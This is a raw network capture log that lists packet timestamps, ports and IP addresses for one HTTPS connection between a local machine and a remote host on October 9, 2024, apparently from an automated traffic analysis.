Oct 9, 2024 16:16:02.015546083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.015552044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.015563011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.015582085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.015728951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.015793085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.015799999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.015815020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.015825987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.015861988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.015866041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.015913010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.016535044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.016597986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.016603947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.016658068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.016664028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.016721010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.016829967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.016892910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017014027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017111063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017127037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017132998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017153978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017215014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017230034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017236948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017292023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017328978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017328978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017335892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017349005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017379999 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017386913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017407894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017472982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017529011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017534971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017549992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017582893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017590046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017599106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017646074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017690897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017716885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017723083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017748117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017805099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017857075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017863035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017868996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017904043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017929077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017940998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017951012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.017959118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017978907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.017982960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.018004894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.018198967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.018251896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.018258095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.018300056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.019756079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.019826889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.019998074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.020057917 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.058078051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.058134079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.058166027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.058207989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.058218956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.058238983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.058252096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.058259964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.058319092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.103473902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103553057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103615046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.103667974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103683949 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.103684902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103729963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.103737116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103746891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103780985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103806019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.103813887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103827953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.103869915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.103934050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103967905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.103992939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.104000092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.104024887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.104557991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.105915070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.105976105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.105983019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106021881 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106046915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106054068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106067896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106074095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106108904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106117964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106126070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106147051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106151104 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106195927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106204033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106209993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106237888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106242895 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106281042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106286049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106292963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106321096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106326103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106370926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106379032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106389046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106420994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106426954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106445074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106445074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106486082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106503010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106508970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106534958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106543064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106553078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106586933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106604099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106616020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106631994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106650114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106666088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.106673956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.106698990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.107522011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.107561111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.107587099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.107594013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.107616901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.145535946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.145687103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.145699978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.145783901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.145883083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.145936012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.145961046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.145966053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.145982027 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.146011114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.146039009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.146095037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.191860914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.191951990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.191998959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.192007065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.192018986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.192034960 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.192042112 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.192061901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.192496061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.192558050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.192651033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.192703009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.192712069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.192770004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.192797899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.192852020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194248915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194366932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194379091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194428921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194436073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194483042 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194483995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194494009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194529057 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194574118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194585085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194645882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194695950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194752932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194832087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194861889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194883108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194890022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.194900036 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194931984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.194971085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195015907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195126057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195168018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195190907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195194960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195214987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195349932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195394993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195399046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195409060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195444107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195467949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195468903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195478916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195488930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195528030 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195760012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195812941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195823908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195837021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195842981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.195852041 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195868969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.195925951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.196011066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.196069956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.196079969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.196132898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.242568016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.242671013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.242706060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.242757082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.242769003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.242825985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.242834091 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.242841005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.242882013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.242882013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.279680967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.279761076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.279795885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.279803038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.279814959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.279861927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.279863119 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.279963017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.280038118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.280333996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.280570984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.280616999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.280673981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.280683041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.280725002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.281974077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282042980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282063961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282109976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282274008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282412052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282458067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282511950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282552004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282607079 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282640934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282675028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282697916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282706022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282732010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282740116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282788992 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282795906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282903910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282951117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282958031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.282974958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.282975912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283011913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283039093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283045053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283060074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283060074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283126116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283241034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283262014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283267975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283287048 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283368111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283416986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283437014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283446074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283463001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283474922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283512115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283521891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283530951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283556938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283564091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283605099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283617973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283658981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283663034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283675909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283699036 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283709049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283792019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.283797979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.283838034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.330629110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.330692053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.330717087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.330719948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.330732107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.330760956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.330769062 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.330935955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.330944061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.330990076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.367275953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.367353916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.367364883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.367368937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.367382050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.367403984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.367432117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.367454052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.367460966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.367485046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.367577076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.367975950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.368021965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.368074894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.368124962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.368238926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.368290901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.368302107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.368310928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.368333101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.368380070 CEST	49723	443	192.168.2.10	84.32.84.109
